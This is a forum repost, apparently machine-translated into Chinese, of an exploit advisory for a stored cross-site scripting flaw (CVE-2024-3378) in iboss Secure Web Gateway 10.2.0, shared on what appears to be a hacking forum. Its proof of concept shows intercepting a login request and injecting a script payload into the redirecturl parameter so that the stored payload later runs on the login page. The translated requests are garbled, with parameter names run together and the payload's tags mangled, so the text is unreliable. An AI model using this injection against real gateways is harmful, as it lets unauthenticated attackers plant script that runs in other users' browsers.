H

IBOSS SECURE WEB网关- 存储的跨站点脚本(XSS)

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: IBOSS SECURE WEB网关- 存储的跨站点脚本(XSS)
#日期: 4/4/2024
#利用作者: modrnproph3t
#供应商homepage: https://www.iboss.com
#版本: 10.2.0
#CVE-2024-3378
#参考: https://github.com/modrnproph3t/cve/blob/main/cve-2024-3378.md
## 描述
在Iboss Secure Web网关产品中发现了存储的跨站点脚本(XSS)漏洞。通过提交登录尝试,拦截请求并在将其发送到服务器之前,将其添加到«Redirecturlóló参数中来利用漏洞。提交请求后,访问初始登录页面将导致网站加载,包括先前提交的有效载荷。
这是一个未经验证的攻击(凭据无需有效),有效载荷存储在服务器上,并包含在登录页面的GET请求中,直到在不包括有效负载的情况下向服务器提出新的帖子请求。
## conept证明
1。访问位于/登录的登录门户
2。提交登录尝试并拦截请求
不变请求的示例:
````````
post /user_login_submit http /1.1
HOST:域
- 头部删除-
用户名=testx=testAction=loginredirecturl=
````````
3。将XSS有效载荷插入“ redirecturl”参数
插入有效载荷:的请求示例
````````
post /user_login_submit http /1.1
HOST:域
- 头部删除-
用户名=testx=testAction=loginredirecturl='scriptalert('xss')/脚本
````````
4。登录尝试失败后,返回/登录端点处的初始登录页面并观察有效载荷执行
 
后退
顶部